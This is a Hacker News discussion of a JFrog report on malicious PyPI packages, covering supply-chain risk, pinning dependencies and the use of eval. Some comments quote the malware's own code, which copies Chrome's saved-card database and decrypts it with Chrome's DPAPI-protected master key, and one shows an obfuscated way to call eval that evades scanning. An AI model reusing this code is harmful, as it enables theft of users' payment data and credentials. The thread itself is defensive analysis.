[HN Gopher] Malicious PyPI packages stealing credit cards and in...
___________________________________________________________________
Malicious PyPI packages stealing credit cards and injecting code
Author : hpb42
Score : 400 points
Date : 2021-08-03 12:01 UTC (10 hours ago)
(HTM) web link (jfrog.com)
(TXT) w3m dump (jfrog.com)
| terom wrote:
| http://webcache.googleusercontent.com/search?q=cache%3Ahttps...
| Google cache still has the malicious package visible FWIW
|
| > This Module Optimises your PC For Python
| toyg wrote:
| _> This Module Optimises your PC For Python_
|
| Well, it does... just not for _your_ Python...
| gunapologist99 wrote:
| All your Pythons are belonging to us
| TheFreim wrote:
| Our python
| qwertox wrote:
| I don't think that it's good to just delete the packages. Same
| goes for Android Apps in the Google Play Store or for Chrome
| Extensions.
|
| These compromised packages should have their page set to a read-
| only mode with downloads/installs disabled, with a big warning
| that they were compromised.
|
| This is specially troublesome with Chrome Extensions and Android
| Apps, where it is not possible to get to know if I actually had
| the extension installed, and if I had, what it was exactly about.
|
| Chrome Extensions getting automatically removed from the browser
| instead of permanently deactivated with a hint of why they can't
| be activated again, and which was the reason why the extension
| got disabled, is a problem for me. How do I know if I had a bad
| extension installed, if personal data has been leaked?
|
| This also applies to PyPI to some degree.
|
| ----
|
| Eventually the downloads should get replaced with a module which,
| when loaded, prints out a well defined warning message and calls
| sys.exit() with a return code which is defined as a
| "vulnerability exception" which a build system can then handle.
| tylfin wrote:
| There is the "Yank" PEP 592 semantic that can be used to mark
| vulnerable packages. It's adoption has been a little slow, but
| I agree, having these packages available and marked accordingly
| makes it easier for security scanning and future detection
| research.
|
| https://www.python.org/dev/peps/pep-0592/
| RulerOf wrote:
| Skimming through that link, it seems that `yank` is for
| pulling _broken_ packages, whereas the suggestion above is to
| explicitly mark them as malicious.
| blamestross wrote:
| Should we call the "mark them malicious" version "Yeet" or
| "Yoink"?
| RulerOf wrote:
| `npm yeet malcious-package`
| gunapologist99 wrote:
| Even better would be allow their install, but to have them
| start up with an immediate panic() sort of function (i.e.,
| print("This package has been found to be malicious; please
| see pypi/evilpackagename for details"); sys.exit(99)) to
| force aborts of any app using those packages.
| blamestross wrote:
| python packages run arbitrary code at install/build time,
| so this isn't viable.
| qwertox wrote:
| It's no longer arbitrary if the PyPI crew is the one who
| controls the code, or did I understand you wrong?
| blamestross wrote:
| Just that it isn't as simple as adding the lines to when
| the code gets executed. I think I misunderstood you,
| instead of prepending the code you are suggesting the
| entire compromised package get replaced with `throw "You
| got Hacked"` at import time.
| qwertox wrote:
| Correct, when the program starts to run and imports the
| modules, as nothing will make admins more aware that
| something is really wrong here. Maybe raise an exception
| which, if not handled, executes sys.exit() with a
| predefined code.
|
| And some mechanism to detect this at install/build time
| as well, so that automated built systems can cleanly
| abort a build and issue a specific message which can then
| be forwarded via email or SMS through some custom code.
|
| The entire package gets replaced by a standardized,
| friendly one. No harmful code gets downloaded.
| joelbondurant wrote:
| import usafacts; import malware; usafacts.check(malware);
| geofft wrote:
| Anyone can upload anything to PyPI. This is kind of like saying
| that you detected malicious packages on GitHub - the question is
| whether anyone actually ran it.
|
| They say that the packages were _downloaded_ 30,000 times, but
| automated processes like mirrors can easily inflate this. (As can
| people doing the exact sort of research they were doing - they
| themselves downloaded the files from PyPI!) Quoting PyPI
| maintainer Dustin Ingram
| https://twitter.com/di_codes/status/1421415135743254533 :
|
| > *And here's your daily reminder that download statistics for
| PyPI are hugely inflated by mirrors & scrapers. Publish a new
| package today and you'll get 1000 'downloads' in 24 hours without
| even telling anyone about it.*
| yonixw wrote:
| If anyone wonders about the same for NPM, it is around 400.
| That what happened to my almost empty package.
|
| https://i.imgur.com/Ryr2voN.png
| Frost1x wrote:
| Part of the issue is that FOSS, libraries, and independendent
| package managers and their specific repositories have
| _exploded_ in about every domain. No longer are there a handful
| of places where software and libraries exist. Pick an ecosystem
| and there 's probably a sub or additional levels of
| package/library management ecosystems below it. Developers have
| really bought into grabbing a package for everything and
| leveraging hundreds and thousands of packages, most of which
| have limited to no sort of vetting. We've had software
| complexity growing over the years, but the one benefit in
| previous years is that it was in fairly concentrated areas
| where many eyes were often watching. You could somewhat rely on
| the fact that someone had looked through and approved such
| additions to a package repo. It's a naive security but there
| were more professional eyes you could leverage, lowering
| overall risk.
|
| Not anymore, it's more of this breakneck speed, leverage every
| package you can to save resources and glue them together
| without looking at them in detail, because the entire reason
| you're using them is because you don't have time. It's not all
| shops, plenty of teams vet or roll their own functionality to
| avoid this but there's a large world of software out there that
| just blindly trusts everything down the chain in an era where
| there should be less trust. Some software shops have never seen
| a package or library they didn't like and will use even trivial
| to implement packages (the benefit of your own implementation
| being you know it's secure and won't change under your feet
| unless an inside threat makes the change). There's a tradeoff
| to externalizing costs and tech debt for maintainance you pass
| on using these systems, the cost being you take on more risk in
| various forms.
| rlpb wrote:
| > Anyone can upload anything to PyPI. This is kind of like
| saying that you detected malicious packages on GitHub - the
| question is whether anyone actually ran it.
|
| There's a bigger social problem here. In many communities it
| has become completely normalized for any dependency to be just
| added from these types of "anyone can upload" repositories
| without any kind of due diligence as to provenance or security.
| It's as if these communities have just given up on that.
|
| For example, if I suggest that a modern web app only use
| dependencies that ship in Debian (a project that does actually
| take this kind of thing seriously), many would laugh me out of
| the building.
|
| The only practical alternative in many cases is to give up
| trying. It's now rare for projects to properly audit their
| dependencies _because_ the community at large isn 't rallying
| around doing it. It's a vicious circle.
|
| This kind of incident serves as a valuable regular reminder of
| the risks that these communities are taking. Dismissing this by
| saying "anyone can upload" misses the point.
| oefrha wrote:
| > It's now rare for projects to properly audit their
| dependencies
|
| In the Python ecosystem, it is at least pretty easy to limit
| yourself to a handful of developers you trust (e.g. Django
| developers, Pallets developers, etc.).
|
| In the npm ecosystem however, for instance I just ran `npx
| create-react-app` and got a node_modules with 1044
| subdirectories, a 11407-line yarn.lock, and "207
| vulnerabilities found" from `yarn audit`. Well what can you
| possibly do.
| toss1 wrote:
| >> if I suggest that a modern web app only use dependencies
| that ship in Debian (a project that does actually take this
| kind of thing seriously), many would laugh me out of the
| building
|
| And you are more right, and they are more wrong than they
| know.
|
| Not only are malicious inserts in code a problem in
| themselves, if you have failed to properly vet your
| dependencies and it causes real losses for one of your
| users/customers, YOU have created a liability for yourself.
| Sure, many customers may never figure it out, and it might
| take them a while to prove it in court, but if it even gets
| to the point where someone is damaged and notices, and
| decides to do something about it, you have defense costs.
|
| The "whatever" attitude has no place in serious engineering
| of any kind, and anyone with a "move fast and break things"
| attitude (unless these tests are properly sandboxed) shows
| that they are not engaged in any serious engineering.
| tyingq wrote:
| Doesn't installing a python package from PyPI (optionally) run
| some of the code in the package? Like "setup.py" ? I'd take
| advantage of that if I were injecting malicious code in a
| module.
| chriswarbo wrote:
| Yep. In fact, I recently had to deal with this monstrosity
| https://pypi.org/project/awslambdaric whose setup.py invokes
| a shell script https://github.com/aws/aws-lambda-python-
| runtime-interface-c...
|
| That shell script runs 'make && make install' on a couple of
| bundled dependencies, but in principle it could do anything
| https://github.com/aws/aws-lambda-python-runtime-
| interface-c...
| dane-pgp wrote:
| For what it's worth, npm supports an option "ignore-scripts"
| for both "npm install" and "npm ci" (the latter of which
| ensures the installed packages match the integrity hashes
| from the package-lock.json file).
|
| https://docs.npmjs.com/cli/v7/commands/npm-
| install/#ignore-s...
|
| https://docs.npmjs.com/cli/v7/commands/npm-ci/#ignore-
| script...
| codefined wrote:
| Downloading a Python package (as done by scrapers, mirrors
| and security analysts) does not run setup.py. Only if the
| module is installed is this run.
|
| It's analagous to downloading vs. running an executable.
| tyingq wrote:
| Ah, sure. Just making the distinction that you don't have
| to actually use a module within your code. That installing
| the module, even if you never use it in your own code, runs
| some of the code in that module.
| Majestic121 wrote:
| Doing a pip install actually runs the setup.py of the
| package for source dist, which means running an executable.
|
| It's not the case for wheels though, so you can protect
| yourself by restricting to binary : --only-binary.
|
| Also doing a pip download is not sensible to this issue,
| but most people do pip install
| karmicthreat wrote:
| There is lots of inconsistency about hash behavior with the
| various repos (pypi, ruby gems) and tools (poetry, bundled).
|
| For a long time poetry didn't even check the hash. So the safer
| option is just maintain these artifacts yourself so you know what
| is going on and have your own policies on maintaining them.
| mm983 wrote:
| why don't they start a partnership with a security company like
| they have with a server monitor and google? many security vendors
| use python somewhere (1), so I'm sure there would be someone
| willing to cooperate. scan all packages uploaded and all updates,
| when there is a detection put a warning on the page and in
| console put a warning like "this package might contain maliscious
| code. continue regardless?" so that typosquatting and code
| hijacking is mitigated
|
| 1 https://github.com/KasperskyLab?q=&type=&language=python&sor...
|
| https://github.com/CrowdStrike?q=&type=&language=python&sort...
|
| https://github.com/intezer?q=&type=&language=python&sort=
| latch wrote:
| Elixir recently added hex diff, which I've found quite useful.
| E.g.: https://diff.hex.pm/diff/jiffy/1.0.7..1.0.8
| CivBase wrote:
| I wonder how many Python packages have a justifiable reason for
| using `eval()` to begin with. I've been writing Python
| professionally for almost a decade and I've never run into a use
| case where it has been necessary. It's occasionally useful for
| debugging, but that's all I've ever legitimately considered it
| for.
|
| It's neat that JFrog can detect evaluation of encoded strings,
| but I think I'd prefer to just set a static analysis rule which
| prevents devs from using `eval()` in the first place.
| blibble wrote:
| namedtuple used exec()
|
| (I've also used exec() for some nasty bundling of multiple
| python files into one before)
| hiccuphippo wrote:
| I don't think there's a good reason to have eval in interpreted
| languages. Sure the REPL uses it but it could be implemented
| internal to the REPL instead of exposing it in the language.
| banana_giraffe wrote:
| You can always call eval without ever mentioning eval in code:
| __builtins__.__dict__[''.join(chr(x^y^(i+33)) for i,(x,y) in
| enumerate(zip(*[iter(ord(z) for z in
| '2vb63qz2')]*2)))]("print('hello, world')")
|
| Maybe there are ways to detect all of the paths, but it feels
| like a tricky quest down lots of rabbit holes to me.
|
| There are also some fairly big packages that use eval(), like
| flask, matplotlib, numba, pandas, and plenty of others. Perhaps
| they could be modified to not use eval, but it might be more
| common than you expect.
| psanford wrote:
| There are plenty of ways you can obfuscate calls to `eval`.
| `unpickle` is a classic example.
| dailyanchovy wrote:
| Nice writeup, but the title flashes to '(1) New Message' and back
| twice a second. That's kind of silly in my opinion, from whom do
| I expect the message? I assume from the chatbot at the bottom
| right corner.
|
| Even so, to talk to it I would need to grant it access to some
| personal information.
|
| It all ends up leaving a bitter aftertaste. Whatever the message
| was, why not place it in a block of text somewhere less
| distracting.
|
| I appreciate the writeup however.
| acdha wrote:
| Add these to your hosts file and the page will load a lot
| faster, too: 0.0.0.0 js.driftt.com
| 0.0.0.0 send.webeyez.com sec.webeyez.com 0.0.0.0
| splitting.peacebanana.com flaming.peacebanana.com
| cube00 wrote:
| This junk is appearing on more and more web sites, at least
| this one is clearly a bot.
|
| Plenty of sales sites will pretend a human is sending you a
| message, try and talk back and all of a sudden you're in a
| queue waiting for a reply.
|
| Another anti pattern for web.
| NullPrefix wrote:
| Well don't be rude, say hi, you never know if it's a person
| on the other end. In that case it's ok to open up about the
| current events in your dogs' life.
| rchaud wrote:
| It's a billion-dollar anti-pattern that's been sanitized as
| "conversational commerce". Several large orgs have Intercom,
| Drift or other popups infesting their site....by choice!
| avian wrote:
| > This junk is appearing on more and more web sites, at least
| this one is clearly a bot.
|
| This is the first time I've seen a page flashing the title
| like that. Extremely annoying and I closed the page before
| reading the article to the end. It reminded me of the times
| when pages used to do that with the browser status bar on the
| bottom of the window.
| dailyanchovy wrote:
| Yeah. The sad thing is, I've never used a single chatbot that
| was actually helpful. I naturally don't go looking for
| conversations with chatbots, but recently more and more
| companies decided to shut down their email address. So the
| only way to resolve an issue is by wither talking to a
| chatbot and then a person (hopefully), or by phoning them
| (and I'd rather not).
|
| Some chatbots even refuse to let me talk to a person at all
| due to a bug (the dutch water utility service). Another asks
| you to write a message to the human representative and then
| discards it due to a bug (bol.com).
| jimmaswell wrote:
| I've had some success finding the pages or processes I need
| on a site with virtual assistants, but the design of the
| website had failed in the first place if I had to resort to
| that.
| ConcernedCoder wrote:
| holy crap the stuff in: AppData\Local\Google\Chrome\User
| Data\default\Web Data ... wtf are you thinking google?
| at_a_remove wrote:
| I have some pretty complex feelings about this.
|
| Many people end up at a given programming language because they
| are fleeing something else, rather than being necessarily drawn
| to it, and I know that in some senses, Python was my reaction to
| having to deal with what I didn't like about Perl. One of the
| larger factors was dealing with CPAN. I was always having to hunt
| down modules, which would do maybe seventy percent of what I
| needed, or a another module, that would cover a _different_
| seventy percent. And then comes the question of, "Can I get this
| to run on Windows?"
|
| Meanwhile, Python made hay with its enormous standard library and
| certainly xkcd made many references to it. Now people tell me
| that the standard library is where code goes to die and I get sad
| all over again ...
| smallerfish wrote:
| ```
|
| def cs(): master_key = master()
| login_db = os.environ['USERPROFILE'] + os.sep + \
| r'AppData\Local\Google\Chrome\User Data\default\Web Data'
| shutil.copy2(login_db, "CCvault.db") conn =
| sqlite3.connect("CCvault.db") cursor = conn.cursor()
| try: cursor.execute("SELECT * FROM credit_cards")
| for r in cursor.fetchall(): username = r[1]
| encrypted_password = r[4] decrypted_password =
| dpw( encrypted_password, master_key)
| expire_mon = r[2] expire_year = r[3]
|
| ```
|
| Where does master_key come from here? Is chrome encryption of
| sensitive information really as weak as that?
| hchasestevens wrote:
| It appears to be: def master(): try:
| with open(os.environ['USERPROFILE'] + os.sep +
| r'AppData\Local\Google\Chrome\User Data\Local State',
| "r", encoding='utf-8') as f: local_state =
| f.read() local_state =
| json.loads(local_state) except: pass
| master_key = base64.b64decode(local_state["os_crypt"]
| ["encrypted_key"]) master_key = master_key[5:]
| master_key = ctypes.windll.crypt32.CryptUnprotectData(
| (master_key, None, None, None, 0)[1]) return
| master_key
| oefrha wrote:
| I found a copy on a PyPI mirror and at a glance couldn't find
| any of the malicious code mentioned:
| https://pypi.tuna.tsinghua.edu.cn/packages/99/84/7f9560403cd...
|
| Also a copy of noblesse2, which I didn't bother to look into
| due to obfuscation:
| https://pypi.tuna.tsinghua.edu.cn/packages/15/59/cbdeed656cf...
| RL_Quine wrote:
| What do you expect it to be "encrypted" with? Unless the user
| is entering a password every time they start the browser,
| there's nothing unique to a system that other malware can't
| just extract and use to decrypt the database.
| MikeKusold wrote:
| On Mac, you could store the master key in the Keychain. I've
| been off of Windows for almost a decade so I'm not sure if
| they have a similar feature.
|
| > Keychain items can be shared only between apps from the
| same developer.
|
| https://support.apple.com/guide/security/keychain-data-
| prote...
| balls187 wrote:
| Windows doesn't have a system level key store.
|
| Instead the Windows API's have a symmetric encryption API
| (DPAPI) that allows developers to supply plain text, and
| receive cipher text.
|
| It would then be up to developers to persist the cipher
| text.
|
| DPAPI master key is protected by the OS, behind User
| Credentials.
| blibble wrote:
| isn't it per user though, instead of per developer (like
| apple)?
|
| a dodgy pypi package that can call CryptUnprotectData too
| ok123456 wrote:
| Palemoon on linux uses the gnome keyring. You have to auth
| against that to get access to your saved passwords.
| smallerfish wrote:
| Right, but I wouldn't have expected that processes outside of
| chrome could get at its internally managed db (or encrypted
| properties), especially if it's using an authenticated
| (chrome) user profile.
|
| Windows doesn't have any application firewalls by default? I
| thought that was the whole thing that came in with Vista that
| people were upset about. (Of course, thinking it through,
| Linux isn't any better, assuming the process is running as
| the same user.)
| ncann wrote:
| If you have untrusted code running on your computer,
| especially with admin privilege, then it's already game
| over no matter what you do. Any kind of stored secret can
| be extracted, and any kind of typed in secret can be
| keylogged.
| HALtheWise wrote:
| This was definitely true a decade ago, but secure
| elements in processors have opened up all sorts of
| options. Unfortunately, taking advantage of those is one
| place where mobile operating systems are far ahead of
| desktops.
| ncann wrote:
| Mobile OS security works by clamping down hard on what
| the local user can do, by severely restricting your
| freedom on what you can do with your device, to the point
| where you can't even access most of the device's file
| system. It works under the assumption and reality that
| 99% of users out there don't have root access on their
| phone. At the other side of the spectrum we have PC where
| we have full freedom to do what we want with just a
| "sudo" or "run as admin" away but that comes with a
| price.
| progmetaldev wrote:
| I know in Chrome on Windows, I am asked for my Windows
| login password if I want to view any saved passwords.
| Really hope that's not just a "UI" feature, and those
| passwords really are encrypted.
| gruez wrote:
| >Really hope that's not just a "UI" feature, and those
| passwords really are encrypted.
|
| It's definitely a ui feature. If you want to extract the
| password all you have to do is visit the login page, open
| the developer console, and type
| $("input[type=password]").value
| progmetaldev wrote:
| I meant more at rest. I think even if you use an
| extension like LastPass with a policy that the user can't
| see the password, it's still going to show up in
| developer tools under the POST.
| soheil wrote:
| I feel like they could have done a better job hiding the code.
| Even something as simple as base64 the code and storing it as a
| constant and then doing an eval. Scanning for something like
| table name credit_card is simple enough to expose this exploit.
| Now I'm worried what other exploits of similar form are out there
| that remain undetected.
| yardstick wrote:
| This is why our build systems don't use public repositories
| directly, and why we always pin to an exact version. Any third
| party dependencies (js/python/java/c/you-name-it) are manually
| uploaded to our Artifactory server- which itself has no internet
| access. All third party libraries are periodically checked for
| new versions, any security announcements etc, and only if we are
| happy do we update the internal repo.
|
| It has been a bit of a challenge, especially with js & node and
| quite literally thousands of dependencies for a single library we
| want to use. In such cases we try avoid the library or look for a
| static/prepackaged version, but even then I don't feel
| particularly comfortable.
|
| I should really start specifying checksums too.
| specialist wrote:
| I did a bunch of nodejs stuff at my last gig. These teams had
| the of practice keeping packages up to date. Drove me frikkin
| nuts. So much churn, chaos.
|
| Is this a JavaScript thing? Carried over from frontend
| development?
|
| Exasperated, I finally stopped advocating for locking
| everything down. Everyone treated me like I was crazy.
| (Reproducible builds?? Pfft!!)
|
| Happens with enterprisey Java, Sprint, Maven projects too. (I
| can't even comment on Python projects; I was just happy when I
| could get them to run.)
|
| What's going on? FOMO?
|
| Lock ~~Look~~ down dependencies. Only upgrade when absolutely
| necessary. Keep things simple to facilitate catching regression
| bugs and such.
|
| Oh well. I moved on. I don't miss it one bit.
| _pmf_ wrote:
| They have no concept of ever needing to reproduce a build.
| And they are probably right if you do continuous development
| of some SaaS stuff.
| aranchelk wrote:
| I've heard the argument that it's not worth spending the
| time to get all aspects of your build environment into
| version control for 100% reproducible builds, but the
| saying "I shouldn't be bothered to know what my upstream
| deps are" that's pretty sad (hopefully rare).
|
| Even with the continuous deploy stuff, I think you're
| giving too much benefit of the doubt. If an upstream non-
| pinned change brings down something critical (e.g.
| payments), you'll revert the change in source, rebuild,
| release, the site is still broken. If you keep old
| artifacts you can push one of those, now you're not really
| doing continuous deployment, and you won't be again until
| you finish root cause analysis, and since you'll never see
| the relevant change in your source code, it could take a
| while.
| cube00 wrote:
| Good luck when your security department starts running XRay
| and demands all your dependencies are at the latest versions
| all the time because every second release of a package is
| reported as vulnerable.
| cyberpunk wrote:
| But.... We're right though? I mean there is some wiggle
| room, if some lib has a security hole in some functionality
| that's not actually being used, but it's all about risk. We
| gate deploys to prod over something like XRay or LifeCycle
| and the frustration it causes our devs is much cheaper than
| deploying something we know is insecure to prod and would
| cause us to fail an audit or something (let alone get
| pwned).
| TechBro8615 wrote:
| There was a recent discussion on HN about `npm audit` and
| its overwhelming number of false positive vulnerabilities
| [0]. I can see a policy like this being frustrating in
| the case of `npm dependencies`. Is this something you
| deal with?
|
| [0] https://news.ycombinator.com/item?id=27761334
| specialist wrote:
| Ya. That's a tough one. Philosophically, I totally support
| vetting. I don't know we'd make it useful.
|
| Pondering...
|
| One past team had a weekly formal "log bash" ritual. I
| _LOVED_ it.
|
| That ops team kept track of everything. Any unexplained log
| entry had to be explained or eliminated. They kept track of
| explained entries on their end, so we wouldn't waste time
| rehashing stuff. I imagine their monitoring tools supported
| filters for squelching noisy explained log entries.
|
| Maybe the security team which owns XRay could do something
| similar.
| Merad wrote:
| > Only upgrade when absolutely necessary.
|
| Gotta disagree with this part. If you're making a web app
| package updates really need to be done on a regular cadence,
| ideally every quarter, but twice a year at minimum IMO. In
| the .Net world at least it feels like most responsible open
| source maintainers make it relatively painless to upgrade
| between incremental major versions (e.g. v4 -> v5). If you
| put off upgrades until someone holds a gun to your head so
| that your dependencies are years out of date, you're much
| more likely to experience painful upgrades that require a lot
| of work.
| wereHamster wrote:
| Everyone I know uses some form of lock file, and most of the
| modern programming languages support it.
|
| As for upgrading only when absolutely necessary, let's be
| honest, nothing is absolutely necessary. If the software is
| old, or slow, or buggy, well dear users you'll just have to
| deal with it.
|
| In my experience however, it's easier to keep dependencies
| relatively up to date all the time, and do the occasional
| change that goes along with each upgrade, than waiting five
| years until it's absolutely necessary, at which point
| upgrading will be a nightmare.
|
| I much rather spend each week 10 minutes reading through the
| short changelog of 5 dependencies to check that yes, that
| changes are simple enough that they can be merged without
| fear, and with the confidence that it's compatible with all
| the other up-to-date dependencies.
| polynomial wrote:
| In my experience although lock files are widely used in
| Node development, utilizing the lock files as part of a
| reproducible build system is far less prevalent in the
| wild. In fact, the majority of Node development I've seen
| eschews reproducible builds on the basis that things are
| moving too fast for that anyway, as if it were somehow a
| DRY violation, but for CICD. Would love to hear from Node
| shops that have established well followed reproducible
| CICD.
| specialist wrote:
| How do you deal with regressions?
|
| For example, we once upgraded the redis client. One brief
| revision of the parser submodule had an apparent resource
| leak. (I can't imagine how...) Causing all of our services
| to ABEND after a few hours.
|
| Because everything is updated aggressively, and there's so
| many dependencies, we couldn't easily back out changes.
|
| --
|
| FWIW, Gilt's "Test Into Production" strategy is the first
| and only sane regime I've heard for "Agile". Potentially
| reasonable successor to the era when teams did actual QA &
| Test.
|
| Sorry, I don't have a handy cite. I advocated for Test Into
| Prod. Alas, we didn't get very far before our ant farm got
| another good shake.
| wereHamster wrote:
| When I see a regression, I look at what was recently
| updated (in the past hours, days), and it's usually one
| of those packages. Because frequent updates tend to be
| independent, it's usually not difficult to revert that
| change (eg. if I update react and lodash at the same
| time, chances are really good that I can revert one of
| those changes independently without any issues)
| actually_a_dog wrote:
| This is the way.
|
| Also, you should try to update as few things as possible
| at once, and let your changes "soak" into production for
| a while before going in all "upgrade ALL the things!"
|
| Why? Well, sometimes things that fail take a while to
| actually start showing you symptoms. Sometimes, the
| failure itself takes a while to propagate, simply due to
| the number of servers you have.
|
| And, one of these days, cosmic rays, or some other random
| memory/disk error is going to flip a critical bit in some
| crucial file in that neato library you depend on. And,
| oh, the fouled up build is only going to go out to a
| subset of your machines.
|
| You'll be glad you didn't "upgrade ALL the things!" when
| any of these things ends up happening to you.
| specialist wrote:
| Totally agree. That why I'm asking if compulsively
| updating modules is a JavaScript, nodejs, whatever
| pathos.
|
| This team pushed multiple changes to prod per day. And
| the load balancer with autoscaling is bouncing instances
| on its own. And, and, and...
|
| So resource leaks were being masked. It was only noticed
| during a lull in work.
|
| And then because so many releases had passed, delta
| debugging was a lot tougher. And then because nodejs &
| npm has a culture of one module per line of source
| (joking!), figuring out which module to blame took even
| more time.
|
| I think continuous deploys are kinda cool. But not
| without a safety net of some sort.
| mathattack wrote:
| Both extremes are bad. If you never change anything, you
| are left behind on a lot of security updates and bug fixes.
| The longer you wait the harder it is to move.
|
| The "stay current" model comes with risks too. It's just a
| matter of figuring out which manner has the better value to
| risk trade off, and how to mitigate the risks.
| goodpoint wrote:
| > It's just a matter of figuring out which manner has the
| better value to risk trade off
|
| This is also bad.
|
| If you want to have both stability/reliability and also
| receive security updates you need somebody to track
| security issues and selectively backport patches.
|
| This is what some Linux distribution do. Mainly Debian,
| Ubuntu, paid versions of SuSE and Red Had and so on
| snapetom wrote:
| The solution was, and always been, to have someone review
| every commit to the libraries that your app uses, and
| raise red flags for security vulnerabilities and breaking
| changes to your application.
|
| Oh, boy, I would love to work for a company that has
| someone like that. Know of any? At the least, I would
| love for a company to just give me time to review library
| changes with any sort of detail.
| actually_a_dog wrote:
| One company I worked for had a bot that would
| periodically go and try to upgrade each individual app
| dependency, then see if everything built and passed
| tests.
|
| If it got a green build, it would make a PR with the
| upgrades, which you could then either choose to merge, or
| tell the bot to STFU about that dependency (or
| optionally, STFU until $SOME_NEWER_VERSION or higher is
| available, or there's a security issue with the current
| version).
|
| If not, it would send a complain-y email to the dev team
| about it, which we could either silence or address by
| manually doing the upgrade.
|
| This worked out rather well for us. I think the net
| effect of having the bot was to make sure we devs
| actually _paid attention_ to what versions of our
| dependencies we were using.
| You-Are-Right wrote:
| This is not a solution.
| dheera wrote:
| I get notifications every other week about my NodeJS packages
| having security vulnerabilities, and so I upgrade.
|
| I'm not sure why NodeJS devs are so bad at security compared
| to say C++ devs. It's not like I'm getting asked to upgrade
| libstdc++ and eigen all the time ...
| ComputerGuru wrote:
| I'm not going to get into barriers for entry and what kind
| of developer chooses which language, but C/C++ has always
| eschewed having unnecessary dependencies (originally
| because dependency management is hard, but that's no longer
| the real reason - it's just become baked into the culture).
| Even if you copy and paste hundreds of lines of code (or
| individual source files) the way you think about and treat
| them is very different from when they are external to your
| code base. You own (your copy of) them now, and at the very
| least, you familiarize yourself with their internals (and
| you wouldn't copy and paste something that had its own
| dependencies). Actual (dynamically linked) dependencies
| don't export objects with super brittle interfaces so much
| as they do expose very stable, carefully designed, and as
| minimal as possible boundaries for interfacing with their
| internals. Anything crossing API boundaries is considered
| leaving/entering the trusted domain, and lifespans of
| pointers and references in a non-garbage collected language
| guide/force you to eschew incorporating external libraries
| into your code globally and isolate the interaction (and
| therefore, the attack surface area) between your code and
| external code.
|
| Then there's the type system. Despite having some of the
| weakest type systems of strongly types languages, C (to
| some extent) and C++ (especially modern C++) are still
| light years ahead of what even Typescript buys you because
| they don't offer the same escape hatches or "fingers
| crossed this TS interface matches the JS object that we are
| binding it to, but two lines from here, no one will
| remember that this isn't actually a native TS class and
| that this non-nullable field might actually be null because
| the compile-time type checking system can't verify this
| even at runtime without manual user validation because the
| MS TS team refuses to transpile type validation because
| they insist on zero overhead even though JS is not a low
| level or systems language."
|
| More than anything else however, developers of statically
| typed languages tend to fundamentally disagree with the
| idea of "move fast and break often" and will put off
| changes for years if they're not at least 90% sure it's
| _the_ correct solution (and even when they end up wrong,
| it's still far better than someone that says "who cares if
| it's _the_ or even just _an actually correct_ solution,
| it's still _a_ solution and we can always revisit this
| later").
| OJFord wrote:
| I tend to assume OSS contributors/maintainers are working
| generally to make things better, features I'm not using/don't
| need aside, they're fixing bugs (that I might not know I'm
| hitting/about to hit), patching security holes, etc. - so
| that's one for the 'pro-upgrading' column.
|
| Against that, sure, there might be something bad in the new
| release (maliciousness aside even, there might be a new
| bug!). But.. there might be in the old one I've pinned to as
| well? Assuming I'm not vetting everything (because how many
| places are, honestly) I have no reason to distrust the new
| version any more than my current one.
|
| Reproducible builds are an orthogonal issue? You can still
| keep your dependencies' versions updated with fully
| reproducible builds. Ours aren't, but we do pin to specific
| versions (requirements.txt & yarn.lock), and keep the former
| up to date with pyup (creates and tests a branch with the
| latest version) and up to date within semver minor versions
| just with yarn update (committed automatically since in
| theory it should be safe, had to revert only occasionally).
| actually_a_dog wrote:
| I agree. Locking things down is the way to go, when it comes
| to safety.
|
| The downside, however, is that, by design, you end up with
| packages that don't get upgraded regularly. That can cause
| problems down the road when you decide you _do_ want to
| upgrade those packages.
|
| For instance, there might be breaking changes, because you're
| jumping major versions. Of course, breaking changes are
| always a problem, but, if you're not regularly upgrading
| stuff, your team will tend to build on/build around the
| functionality of the old version.
|
| That leads to some real fun come upgrade time. If, you're,
| say, 3 major versions behind the latest version, or whatever
| version you want to upgrade to that contains some Cool New
| Feature(tm) you really, really _need_ , you might end up
| having to do this silly dance of upgrading major versions one
| at a time, in order to keep the complexity of the upgrade
| process as a whole under control.
|
| Oh, and, sometimes things get deprecated. That's always fun
| to deal with.
|
| So, TL;DR: Yes, pin versions! It's safer that way! Just be
| aware that, like most engineering decisions, there's a
| tradeoff here that saves you some pain now in exchange for
| some amount of a different kind of pain in the future.
| wiremine wrote:
| Feels like this is a business opportunity for someone.
|
| Use case:
|
| 1. Upload a pre-reviewed package.json file. 2. The service
| monitors changes, and recommends updates. Recommendations
| might include security, bug, features, etc. It would check
| downstream dependencies, too. For production systems, the
| team might only care about security features. 3. Developer
| team can review recommendations, and download the new
| package.json.
|
| (There are lots of opportunities to improve this: direct
| integration with git, etc.)
|
| Anybody know if this sort of service exists? I know npm has
| _some_ of this. Maybe I'm just ignorant of how much of a
| solved problem this is?
| goodpoint wrote:
| > Feels like this is a business opportunity for someone.
|
| This is what some Linux distributions do. Quality review,
| legal review, security backports.
| cilefen wrote:
| We use Renovate for this.
| rank0 wrote:
| What you're looking for is called SCA (software composition
| analysis).
|
| Best tool I've used so far in this domain is snyk.
| Macha wrote:
| Backwards compatibility in the javascript world isn't great.
| If you stop updating for a couple of years, half your
| libraries have incompatible API changes. Then something like
| a node or UI framework update comes along and makes you
| update them all at once to work on the new version, and
| you're rewriting half your application just to move to a non-
| vulnerable version of your core dependency.
| oblio wrote:
| Java/Spring/Maven should have locked down dependencies by
| default. They have to go out of their way to not do that. Not
| that some people don't, anyway.
|
| Typos:
|
| > I stopped advocating for locking everything down.
|
| started?
|
| > Look down dependencies.
|
| lock?
| watermelon0 wrote:
| AFAIK Maven and Gradle don't have any built-in way of
| locking down dependencies (direct or transient), unless I
| missed something.
| cesarb wrote:
| In my experience, Maven always uses the exact version
| specified in your pom.xml (and the pom.xml of your
| dependencies, transitively), it never uses a newer
| version automatically. That is, the built-in way in Maven
| _is_ locked down dependencies.
| specialist wrote:
| Edited. Thanks for proofreading my rant. :)
| nvrspyx wrote:
| I think the first typo is actually correct. They're saying
| that they stopped advocating for it because everyone
| treated them like they were crazy for doing so.
| fnord77 wrote:
| on the other hand, if you don't keep your packages up to
| date, you can get so behind that it is nearly impossible to
| upgrade.
|
| especially bad if the older version you are on turns out to
| have vulns.
|
| Josh Bloch says to update your packages frequently and I
| agree.
| paulddraper wrote:
| For quite a while now, the JS ecosystem has used lock files
| -- npm, yarn, pnpm. You have to got out of your way not to
| pin JS dependencies.
| dec0dedab0de wrote:
| node locks down dependencies for you, not only the version,
| but it saves a hash too. The problem is that npm install will
| install the newest version allowed in your config, and re
| lock it. However if you run npm ci, it will only install what
